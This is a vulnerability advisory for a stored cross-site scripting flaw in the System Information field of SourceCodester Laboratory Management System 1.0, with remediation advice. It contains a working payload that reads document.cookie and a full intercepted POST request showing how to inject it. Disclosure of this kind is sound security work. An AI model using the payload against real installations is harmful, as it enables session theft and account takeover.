Skip to content

Latest commit

 

History

History
99 lines (68 loc) · 4.46 KB

CVE-2024-34230.md

File metadata and controls

99 lines (68 loc) · 4.46 KB
Raw

Stored Cross-Site Scripting Vulnerability in SourceCodester Laboratory Management System 1.0 :

Vendor: Sourcecodester Product: Laboratory Management System 1.0 Product URL: Laboratory Management System 1.0 Executive Summary

Stored Cross-Site Scripting (SXSS) vulnerability in Laboratory Management System 1.0 and earlier allows attacker to inject the Malicious JavaScript Code in the "System Information" input field. The malicious code can then be executed whenever the vulnerable web page is accessed by any user, staff or even admin and will remain persistent. It will eventually result in account takeover as the session cookies can be accessed by the malicious JavaScript Code. Issue Details

Vulnerability Name: Stored XSS in System Information Severity: High Affected URL: php-lms/admin/?page=system_info Affected Parameter: System Information HTTP Method: POST Issue Description

The web application is vulnerable to Cross-Site Scripting (SXSS) attacks in the "System Information" input field. An attacker can exploit this vulnerability by inputting the malicious JavaScript code in the HTTP POST request to create the user. In the provided example, the attacker modifies the "System Information" parameter to insert a malicious JavaScript Code that can also access the authentication cookies. Proof Of Concept

Configure a web proxy in your browser.

Navigate to the URL in the browser http://localhost/php-lms/admin/?page=system_info

Fill in the desired data in the input fields. Intercept the request in the web proxy. Modify the System Information parameter as shown below and send the request to the server.

Content-Disposition: form-data; name="name"

"><img src=x onerror=alert(document.cookie)>

In the browser just create an account and navigate to homepage

https://drive.google.com/file/d/1Fm7ppEvqs5UrJOK7EuMMQM4X4KpPTBTq/view?usp=drive_link https://drive.google.com/file/d/1xUbfvAwPu70JZrQoomgWTulL4t5j9zbF/view?usp=drive_link

Payload:

Content-Disposition: form-data; name="name"

"><img src=x onerror=alert(document.cookie)>

Request:

POST /php-lms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------38752725403898646351608141163
Content-Length: 663
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lms/admin/?page=system_info
Cookie: PHPSESSID=mmoofhiuab699hj8pkoi61nmnr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="name"

"><img src=x onerror=alert(document.cookie)>

-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="short_name"

LMS - PHP
-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


-----------------------------38752725403898646351608141163--

Impact:

Stored XSS attacks can have serious consequences, such as Account takeover by stealing cookies, stealing sensitive data, modifying the content of the web page, or redirecting users to a malicious sites. Remediation:

Implement proper input validation and output encoding to prevent malicious code from being injected into the web application. Use server-side validation to ensure that user input is properly sanitized before being stored in a database or displayed on a web page. Use output encoding to ensure that any user input that is displayed on the web page is properly encoded to prevent malicious code from being executed. References:

https://portswigger.net/web-security/cross-site-scripting/stored

https://owasp.org/www-community/attacks/xss/

Weakness Enumeration: CWE-79

This report highlights the Stored XSS vulnerability present in the System Information parameter of php-lms/admin/?page=system_info, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.